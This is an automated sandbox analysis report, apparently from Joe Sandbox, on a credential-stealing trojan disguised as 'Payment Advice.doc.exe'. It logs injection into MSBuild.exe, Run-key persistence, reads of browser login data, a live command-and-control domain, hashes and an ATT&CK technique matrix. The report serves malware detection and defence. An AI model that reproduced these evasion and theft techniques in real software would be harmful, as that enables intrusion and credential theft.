              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, Code function: String function: 004081AA appears 110 times
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, Code function: String function: 0041F724 appears 31 times
              Source: Payment Advice.doc.exe, 00000000.00000000.242151423.0000000000F32000.00000002.00000001.01000000.00000003.sdmp, Binary or memory string: OriginalFilenameBrdbffygq.exe6 vs Payment Advice.doc.exe
              Source: Payment Advice.doc.exe, Binary or memory string: OriginalFilenameBrdbffygq.exe6 vs Payment Advice.doc.exe
              Source: Payment Advice.doc.exe, ReversingLabs: Detection: 41%
              Source: C:\Users\user\Desktop\Payment Advice.doc.exe, File read: C:\Users\user\Desktop\Payment Advice.doc.exe
              Source: Payment Advice.doc.exe, Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
              Source: C:\Users\user\Desktop\Payment Advice.doc.exe, Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
              Source: unknown, Process created: C:\Users\user\Desktop\Payment Advice.doc.exe "C:\Users\user\Desktop\Payment Advice.doc.exe"
              Source: C:\Users\user\Desktop\Payment Advice.doc.exe, Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout 20
              Source: C:\Windows\SysWOW64\cmd.exe, Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exe, Process created: C:\Windows\SysWOW64\timeout.exe timeout 20
              Source: unknown, Process created: C:\Users\user\AppData\Local\word.exe "C:\Users\user\AppData\Local\word.exe"
              Source: unknown, Process created: C:\Users\user\AppData\Local\word.exe "C:\Users\user\AppData\Local\word.exe"
              Source: C:\Users\user\Desktop\Payment Advice.doc.exe, Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
              Source: C:\Users\user\Desktop\Payment Advice.doc.exe, Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
              Source: C:\Users\user\Desktop\Payment Advice.doc.exe, Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
              Source: C:\Users\user\AppData\Local\word.exe, Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout 20
              Source: C:\Windows\SysWOW64\cmd.exe, Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exe, Process created: C:\Windows\SysWOW64\timeout.exe timeout 20
              Source: C:\Users\user\AppData\Local\word.exe, Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout 20
              Source: C:\Windows\SysWOW64\cmd.exe, Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exe, Process created: C:\Windows\SysWOW64\timeout.exe timeout 20
              Source: C:\Users\user\Desktop\Payment Advice.doc.exe, Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32
              Source: C:\Users\user\Desktop\Payment Advice.doc.exe, File created: C:\Users\user\AppData\Local\word.exe
              Source: classification engine, Classification label: mal100.troj.spyw.evad.winEXE@24/3@3/1
              Source: C:\Users\user\Desktop\Payment Advice.doc.exe, File read: C:\Users\user\Desktop\desktop.ini
              Source: C:\Users\user\Desktop\Payment Advice.doc.exe, Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
              Source: C:\Users\user\AppData\Local\word.exe, Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
              Source: C:\Users\user\AppData\Local\word.exe, Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, Mutant created: \Sessions\1\BaseNamedObjects\-
              Source: C:\Windows\System32\conhost.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7136:120:WilError_01
              Source: C:\Windows\System32\conhost.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6452:120:WilError_01
              Source: C:\Windows\System32\conhost.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6156:120:WilError_01
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, File read: C:\Windows\System32\drivers\etc\hosts
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, File read: C:\Windows\System32\drivers\etc\hosts
              Source: C:\Users\user\Desktop\Payment Advice.doc.exe, File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
              Source: Payment Advice.doc.exe, Static PE information: Virtual size of .text is bigger than: 0x100000
              Source: Payment Advice.doc.exe, Static file information: File size 1526784 > 1048576
              Source: Payment Advice.doc.exe, Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
              Source: Payment Advice.doc.exe, Static PE information: Raw size of .text is bigger than: 0x100000 < 0x165c00
              Source: Payment Advice.doc.exe, Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

              Data Obfuscation

              Source: Payment Advice.doc.exe, Kbhrk/DescriptorClientItem.cs, .Net Code: InsertState System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
              Source: word.exe.0.dr, Kbhrk/DescriptorClientItem.cs, .Net Code: InsertState System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
              Source: 0.0.Payment Advice.doc.exe.f30000.0.unpack, Kbhrk/DescriptorClientItem.cs, .Net Code: InsertState System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
              Source: 19.0.word.exe.310000.0.unpack, Kbhrk/DescriptorClientItem.cs, .Net Code: InsertState System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
              Source: 19.2.word.exe.310000.0.unpack, Kbhrk/DescriptorClientItem.cs, .Net Code: InsertState System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
              Source: 20.0.word.exe.390000.0.unpack, Kbhrk/DescriptorClientItem.cs, .Net Code: InsertState System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
              Source: 20.2.word.exe.390000.0.unpack, Kbhrk/DescriptorClientItem.cs, .Net Code: InsertState System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
              Source: C:\Users\user\Desktop\Payment Advice.doc.exe, Code function: 0_2_00F32C1C push ecx; retf 0_2_00F32C22
              Source: C:\Users\user\AppData\Local\word.exe, Code function: 19_2_00312C1C push ecx; retf 19_2_00312C22
              Source: C:\Users\user\AppData\Local\word.exe, Code function: 19_2_00F05D38 push eax; retf 19_2_00F05D49
              Source: C:\Users\user\AppData\Local\word.exe, Code function: 19_2_00F49CC1 push 00000004h; ret 19_2_00F49CD5
              Source: C:\Users\user\AppData\Local\word.exe, Code function: 19_2_04D41DE9 push ss; iretd 19_2_04D41DEA
              Source: C:\Users\user\AppData\Local\word.exe, Code function: 19_2_04D41E08 push ss; iretd 19_2_04D41E0E
              Source: C:\Users\user\AppData\Local\word.exe, Code function: 19_2_04D41E29 push ss; iretd 19_2_04D41E2F
              Source: C:\Users\user\AppData\Local\word.exe, Code function: 19_2_04D461F7 push E80C875Eh; retf 19_2_04D46201
              Source: C:\Users\user\AppData\Local\word.exe, Code function: 19_2_04D4493E push ebp; iretd 19_2_04D44940
              Source: C:\Users\user\AppData\Local\word.exe, Code function: 20_2_00392C1C push ecx; retf 20_2_00392C22
              Source: C:\Users\user\AppData\Local\word.exe, Code function: 20_2_00C644F0 push ds; retf 20_2_00C644FA
              Source: C:\Users\user\AppData\Local\word.exe, Code function: 20_2_00C62408 push cs; retf 20_2_00C6240E
              Source: C:\Users\user\AppData\Local\word.exe, Code function: 20_2_00C6367C push cs; retf 20_2_00C6367E
              Source: C:\Users\user\AppData\Local\word.exe, Code function: 20_2_00C6C8DE push es; retf 20_2_00C6C8E0
              Source: C:\Users\user\AppData\Local\word.exe, Code function: 20_2_00C649FC pushfd ; retf 0000h 20_2_00C64A12
              Source: C:\Users\user\AppData\Local\word.exe, Code function: 20_2_00C6093F push ecx; retf 20_2_00C60946
              Source: C:\Users\user\AppData\Local\word.exe, Code function: 20_2_00C64A91 pushfd ; retf 0000h 20_2_00C64A92
              Source: C:\Users\user\AppData\Local\word.exe, Code function: 20_2_00C64A51 pushfd ; retf 0000h 20_2_00C64A52
              Source: C:\Users\user\AppData\Local\word.exe, Code function: 20_2_00C6CA75 push es; retf 20_2_00C6CA77
              Source: C:\Users\user\AppData\Local\word.exe, Code function: 20_2_00C64A30 pushfd ; retf 0000h 20_2_00C64A32
              Source: C:\Users\user\AppData\Local\word.exe, Code function: 20_2_00C64A3D push ds; retf 20_2_00C64A3E
              Source: C:\Users\user\AppData\Local\word.exe, Code function: 20_2_00C6CB95 push es; retf 20_2_00C6CB97
              Source: C:\Users\user\AppData\Local\word.exe, Code function: 20_2_00C6CBA2 push es; retf 20_2_00C6CBA7
              Source: C:\Users\user\AppData\Local\word.exe, Code function: 20_2_00C6CD5F push es; retf 20_2_00C6CD6A
              Source: C:\Users\user\AppData\Local\word.exe, Code function: 20_2_028B6666 pushad ; retf 20_2_028B666F
              Source: C:\Users\user\AppData\Local\word.exe, Code function: 20_2_028B6679 pushad ; retf 20_2_028B667A
              Source: C:\Users\user\AppData\Local\word.exe, Code function: 20_2_028B2ADF push es; retf 20_2_028B2AEF
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, Code function: 28_2_00409E61 push eax; mov dword ptr [esp], ebx 28_2_00409FDE
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, Code function: 28_2_0040DCE9 push ecx; mov dword ptr [esp], 00423976h 28_2_0040DD9F
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, Code function: 28_2_0040DCE9 push ebp; mov dword ptr [esp], 0042398Ah 28_2_0040DDD9
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, Code function: 28_2_0040DCE9 push edx; mov dword ptr [esp], 00423997h 28_2_0040DDF7
              Source: Payment Advice.doc.exe, Static PE information: 0x858D4DE3 [Tue Jan 1 05:17:23 2041 UTC]
              Source: C:\Users\user\Desktop\Payment Advice.doc.exe, File created: C:\Users\user\AppData\Local\word.exe
              Source: C:\Users\user\Desktop\Payment Advice.doc.exe, Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run word
              Source: C:\Users\user\Desktop\Payment Advice.doc.exe, Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run word

              Hooking and other Techniques for Hiding and Protection

              Source: Possible double extension: doc.exe, Static PE information: Payment Advice.doc.exe
              Source: C:\Users\user\AppData\Local\word.exe, Registry key monitored for changes: HKEY_CURRENT_USER_Classes
              Source: C:\Users\user\Desktop\Payment Advice.doc.exe, Process information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\word.exe, Process information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\Payment Advice.doc.exe TID: 6288, Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\SysWOW64\timeout.exe TID: 5844, Thread sleep count: 162 > 30
              Source: C:\Windows\SysWOW64\timeout.exe TID: 3980, Thread sleep count: 57 > 30
              Source: C:\Windows\System32\conhost.exe, Last function: Thread delayed
              Source: C:\Windows\System32\conhost.exe, Last function: Thread delayed
              Source: C:\Windows\System32\conhost.exe, Last function: Thread delayed
              Source: C:\Windows\System32\conhost.exe, Last function: Thread delayed
              Source: C:\Windows\SysWOW64\timeout.exe, Last function: Thread delayed
              Source: C:\Windows\SysWOW64\timeout.exe, Last function: Thread delayed
              Source: C:\Windows\System32\conhost.exe, Last function: Thread delayed
              Source: C:\Windows\SysWOW64\timeout.exe, Last function: Thread delayed
              Source: C:\Windows\SysWOW64\timeout.exe, Last function: Thread delayed
              Source: C:\Users\user\Desktop\Payment Advice.doc.exe, Thread delayed: delay time: 922337203685477
              Source: C:\Users\user\Desktop\Payment Advice.doc.exe, Process information queried: ProcessInformation
              Source: C:\Users\user\Desktop\Payment Advice.doc.exe, Thread delayed: delay time: 922337203685477
              Source: word.exe, 00000013.00000002.526770382.0000000004540000.00000004.00000800.00020000.00000000.sdmp, word.exe, 00000013.00000002.528312106.0000000008000000.00000004.08000000.00040000.00000000.sdmp, word.exe, 00000014.00000002.527972501.0000000008130000.00000004.08000000.00040000.00000000.sdmp, word.exe, 00000014.00000002.525884297.0000000004650000.00000004.00000800.00020000.00000000.sdmp, Binary or memory string: nNECPliQeMupsLrgG3v
              Source: C:\Users\user\Desktop\Payment Advice.doc.exe, Process token adjusted: Debug
              Source: C:\Users\user\Desktop\Payment Advice.doc.exe, Memory allocated: page read and write | page guard

              HIPS / PFW / Operating System Protection Evasion

              Source: C:\Users\user\Desktop\Payment Advice.doc.exe, Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000
              Source: C:\Users\user\Desktop\Payment Advice.doc.exe, Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 401000
              Source: C:\Users\user\Desktop\Payment Advice.doc.exe, Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 422000
              Source: C:\Users\user\Desktop\Payment Advice.doc.exe, Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 427000
              Source: C:\Users\user\Desktop\Payment Advice.doc.exe, Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 42F000
              Source: C:\Users\user\Desktop\Payment Advice.doc.exe, Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 430000
              Source: C:\Users\user\Desktop\Payment Advice.doc.exe, Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 432000
              Source: C:\Users\user\Desktop\Payment Advice.doc.exe, Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 83C008
              Source: C:\Users\user\Desktop\Payment Advice.doc.exe, Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5A
              Source: C:\Users\user\Desktop\Payment Advice.doc.exe, Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout 20
              Source: C:\Users\user\Desktop\Payment Advice.doc.exe, Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
              Source: C:\Users\user\Desktop\Payment Advice.doc.exe, Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
              Source: C:\Users\user\Desktop\Payment Advice.doc.exe, Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
              Source: C:\Windows\SysWOW64\cmd.exe, Process created: C:\Windows\SysWOW64\timeout.exe timeout 20
              Source: C:\Users\user\AppData\Local\word.exe, Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout 20
              Source: C:\Users\user\AppData\Local\word.exe, Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout 20
              Source: C:\Windows\SysWOW64\cmd.exe, Process created: C:\Windows\SysWOW64\timeout.exe timeout 20
              Source: C:\Windows\SysWOW64\cmd.exe, Process created: C:\Windows\SysWOW64\timeout.exe timeout 20
              Source: C:\Users\user\Desktop\Payment Advice.doc.exe, Queries volume information: C:\Users\user\Desktop\Payment Advice.doc.exe VolumeInformation
              Source: C:\Users\user\Desktop\Payment Advice.doc.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
              Source: C:\Users\user\Desktop\Payment Advice.doc.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
              Source: C:\Users\user\AppData\Local\word.exe, Queries volume information: C:\Users\user\AppData\Local\word.exe VolumeInformation
              Source: C:\Users\user\AppData\Local\word.exe, Queries volume information: C:\Users\user\AppData\Local\word.exe VolumeInformation

              Stealing of Sensitive Information

              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, Code function: %s\Google\Chrome\User Data\Default\Login Data 28_2_0040F281
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, Code function: %s\Chromium\User Data\Default\Login Data 28_2_0040F382

              Remote Access Functionality

              Source: Yara match, File source: 28.0.MSBuild.exe.400000.3.raw.unpack, type: UNPACKEDPE
              Source: Yara match, File source: 28.0.MSBuild.exe.400000.7.raw.unpack, type: UNPACKEDPE
              Source: Yara match, File source: 28.0.MSBuild.exe.400000.2.unpack, type: UNPACKEDPE
              Source: Yara match, File source: 28.0.MSBuild.exe.400000.7.unpack, type: UNPACKEDPE
              Source: Yara match, File source: 28.0.MSBuild.exe.400000.1.unpack, type: UNPACKEDPE
              Source: Yara match, File source: 28.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara match, File source: 28.0.MSBuild.exe.400000.2.raw.unpack, type: UNPACKEDPE
              Source: Yara match, File source: 28.0.MSBuild.exe.400000.6.raw.unpack, type: UNPACKEDPE
              Source: Yara match, File source: 28.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara match, File source: 28.0.MSBuild.exe.400000.5.raw.unpack, type: UNPACKEDPE
              Source: Yara match, File source: 28.0.MSBuild.exe.400000.4.unpack, type: UNPACKEDPE
              Source: Yara match, File source: 28.0.MSBuild.exe.400000.4.raw.unpack, type: UNPACKEDPE
              Source: Yara match, File source: 28.0.MSBuild.exe.400000.3.unpack, type: UNPACKEDPE
              Source: Yara match, File source: 28.0.MSBuild.exe.400000.6.unpack, type: UNPACKEDPE
              Source: Yara match, File source: 28.0.MSBuild.exe.400000.5.unpack, type: UNPACKEDPE
              Source: Yara match, File source: 28.0.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara match, File source: 0000001C.00000000.461340745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match, File source: 0000001C.00000000.464329666.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match, File source: 0000001C.00000000.456439559.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match, File source: 0000001C.00000002.516279266.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match, File source: 0000001C.00000000.463163669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match, File source: 0000001C.00000000.450308266.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match, File source: 0000001C.00000000.444253682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match, File source: Process Memory Space: MSBuild.exe PID: 3280, type: MEMORYSTR
              Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
              Valid Accounts | Windows Management Instrumentation | 1 Registry Run Keys / Startup Folder | 211 Process Injection | 11 Masquerading | 1 OS Credential Dumping | 1 Query Registry | Remote Services | 21 Input Capture | Exfiltration Over Other Network Medium | 12 Encrypted Channel | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
              Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | 1 Registry Run Keys / Startup Folder | 1 Disable or Modify Tools | 21 Input Capture | 11 Security Software Discovery | Remote Desktop Protocol | 1 Archive Collected Data | Exfiltration Over Bluetooth | 1 Non-Application Layer Protocol | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
              Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | 21 Virtualization/Sandbox Evasion | 1 Credentials In Files | 1 Process Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | 12 Application Layer Protocol | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
              Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | 211 Process Injection | NTDS | 21 Virtualization/Sandbox Evasion | Distributed Component Object Model | Input Capture | Scheduled Transfer | Protocol Impersonation | SIM Card Swap | | Carrier Billing Fraud
              Cloud Accounts | Cron | Network Logon Script | Network Logon Script | 1 Deobfuscate/Decode Files or Information | LSA Secrets | 1 Remote System Discovery | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
              Replication Through Removable Media | Launchd | Rc.common | Rc.common | 12 Obfuscated Files or Information | Cached Domain Credentials | 1 File and Directory Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
              External Remote Services | Scheduled Task | Startup Items | Startup Items | 11 Software Packing | DCSync | 11 System Information Discovery | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
              Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | 1 Timestomp | Proc Filesystem | Network Service Scanning | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue
              [Behavior graph: ID 624065, Sample: Payment Advice.doc.exe, Startdate: 11/05/2022, Architecture: WINDOWS, Score: 100]

              Source | Detection | Scanner | Label
              Payment Advice.doc.exe | 41% | ReversingLabs | ByteCode-MSIL.Trojan.AgentTesla
              Payment Advice.doc.exe | 100% | Avira | HEUR/AGEN.1232117
              Payment Advice.doc.exe | 100% | Joe Sandbox ML |

              Source | Detection | Scanner | Label
              C:\Users\user\AppData\Local\word.exe | 100% | Avira | HEUR/AGEN.1232117
              C:\Users\user\AppData\Local\word.exe | 100% | Joe Sandbox ML |
              C:\Users\user\AppData\Local\word.exe | 41% | ReversingLabs | ByteCode-MSIL.Trojan.AgentTesla

              Source | Detection | Scanner | Label
              28.0.MSBuild.exe.400000.3.unpack | 100% | Avira | TR/Spy.Gen
              20.0.word.exe.390000.0.unpack | 100% | Avira | HEUR/AGEN.1232117
              19.0.word.exe.310000.0.unpack | 100% | Avira | HEUR/AGEN.1232117
              28.0.MSBuild.exe.400000.7.unpack | 100% | Avira | TR/Spy.Gen
              28.0.MSBuild.exe.400000.4.unpack | 100% | Avira | TR/Spy.Gen
              28.0.MSBuild.exe.400000.6.unpack | 100% | Avira | TR/Spy.Gen
              28.0.MSBuild.exe.400000.5.unpack | 100% | Avira | TR/Spy.Gen
              28.0.MSBuild.exe.400000.0.unpack | 100% | Avira | TR/Spy.Gen
              28.2.MSBuild.exe.400000.0.unpack | 100% | Avira | TR/Spy.Gen
              20.2.word.exe.390000.0.unpack | 100% | Avira | HEUR/AGEN.1232117
              28.0.MSBuild.exe.400000.1.unpack | 100% | Avira | TR/Spy.Gen
              28.0.MSBuild.exe.400000.2.unpack | 100% | Avira | TR/Spy.Gen
              0.0.Payment Advice.doc.exe.f30000.0.unpack | 100% | Avira | HEUR/AGEN.1232117
              19.2.word.exe.310000.0.unpack | 100% | Avira | HEUR/AGEN.1232117

              Source | Detection | Scanner | Label
              chongmei33.myddns.rocks | 8% | Virustotal |
              windowsupdatebg.s.llnwi.net | 0% | Virustotal |

              Source | Detection | Scanner | Label
              chongmei33.myddns.rocks:49703 | 100% | Avira URL Cloud | malware
              http://www.yandex.comsocks= | 0% | Avira URL Cloud | safe
              Name | IP | Active | Malicious | Antivirus Detection | Reputation
              chongmei33.myddns.rocks | 172.111.216.19 | true | true | | unknown
              windowsupdatebg.s.llnwi.net | 95.140.230.192 | true | false | | unknown

              Name | Malicious | Antivirus Detection | Reputation
              chongmei33.myddns.rocks:49703 | true | Avira URL Cloud: malware | unknown

              Name | Source | Malicious | Antivirus Detection | Reputation
              http://www.yandex.com | MSBuild.exe | false | | high
              https://stackoverflow.com/q/14436606/23354 | word.exe, 00000013.00000002.523008379.000000000293F000.00000004.00000800.00020000.00000000.sdmp, word.exe, 00000014.00000002.522774613.0000000002A4F000.00000004.00000800.00020000.00000000.sdmp | false | | high
              http://www.yandex.comsocks= | MSBuild.exe, 0000001C.00000000.461340745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 0000001C.00000002.516279266.0000000000400000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 0000001C.00000000.444253682.0000000000400000.00000040.00000400.00020000.00000000.sdmp | false | Avira URL Cloud: safe | low
              https://stackoverflow.com/q/2152978/23354rCannot | word.exe, 00000013.00000002.523008379.000000000293F000.00000004.00000800.00020000.00000000.sdmp, word.exe, 00000014.00000002.522774613.0000000002A4F000.00000004.00000800.00020000.00000000.sdmp | false | | high
              https://stackoverflow.com/q/11564914/23354; | word.exe, 00000013.00000002.523008379.000000000293F000.00000004.00000800.00020000.00000000.sdmp, word.exe, 00000014.00000002.522774613.0000000002A4F000.00000004.00000800.00020000.00000000.sdmp | false | | high
                      IP | Domain | Country | ASN | ASN Name | Malicious
                      172.111.216.19 | chongmei33.myddns.rocks | United States | 9009 | M247GB | true
                      Joe Sandbox Version:34.0.0 Boulder Opal
                      Analysis ID:624065
                      Start date and time: 11/05/2022 03:05:09 (2022-05-11 03:05:09 +02:00)
                      Joe Sandbox Product:CloudBasic
                      Overall analysis duration:0h 10m 34s
                      Hypervisor based Inspection enabled:false
                      Report type:full
                      Sample file name:Payment Advice.doc.exe
                      Cookbook file name:default.jbs
                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                      Number of analysed new started processes analysed:38
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:0
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • HDC enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Detection:MAL
                      Classification:mal100.troj.spyw.evad.winEXE@24/3@3/1
                      EGA Information:Failed
                      HDC Information:
                      • Successful, ratio: 7% (good quality ratio 4.2%)
                      • Quality average: 48.1%
                      • Quality standard deviation: 43.9%
                      HCA Information:
                      • Successful, ratio: 82%
                      • Number of executed functions: 266
                      • Number of non-executed functions: 31
                      Cookbook Comments:
                      • Found application associated with file extension: .exe
                      • Adjust boot time
                      • Enable AMSI
                      • Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, BackgroundTransferHost.exe, UpdateNotificationMgr.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, UsoClient.exe
                      • Excluded IPs from analysis (whitelisted)
                      • Excluded domains from analysis (whitelisted)
                      • Execution Graph export aborted for target MSBuild.exe, PID 3280 because it is empty
                      • Execution Graph export aborted for target Payment Advice.doc.exe, PID 6264 because there are no executed function
                      • Execution Graph export aborted for target word.exe, PID 4816 because it is empty
                      • Execution Graph export aborted for target word.exe, PID 6104 because it is empty
                      • Not all processes where analyzed, report is missing behavior information
                      • Report size exceeded maximum capacity and may have missing behavior information.
                      • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                      • Report size getting too big, too many NtOpenKeyEx calls found.
                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                      • Report size getting too big, too many NtQueryValueKey calls found.
                      Time | Type | Description
                      03:07:07 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run word "C:\Users\user\AppData\Local\word.exe"
                      03:07:15 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run word "C:\Users\user\AppData\Local\word.exe"
                      Match | Associated Sample Name / URL | Detection | Context
                      chongmei33.myddns.rocks | ORDER #0554.exe | malicious | 37.120.208.37
                      chongmei33.myddns.rocks | Quotation #01521.exe | malicious | 37.120.208.40
                      Process:C:\Users\user\Desktop\Payment Advice.doc.exe
                      File Type:ASCII text, with CRLF line terminators
                      Category:modified
                      Size (bytes):805
                      Entropy (8bit):5.360596073797118
                      Encrypted:false
                      SSDEEP:24:ML9E4Ks2wKDE4KhK3VZ9pKhRAE4Kzr7GE4Kx1qE4j:MxHKXwYHKhQnoRAHKzvGHKx1qHj
                      MD5:0647161723678221993F7C643DC061CA
                      SHA1:89827E9F23374A366A37A65D342426E3FE55B51D
                      SHA-256:6DFEA2C2005700B36688D32D2F85A3B19C552DDC696170C54507DF3C59B5167B
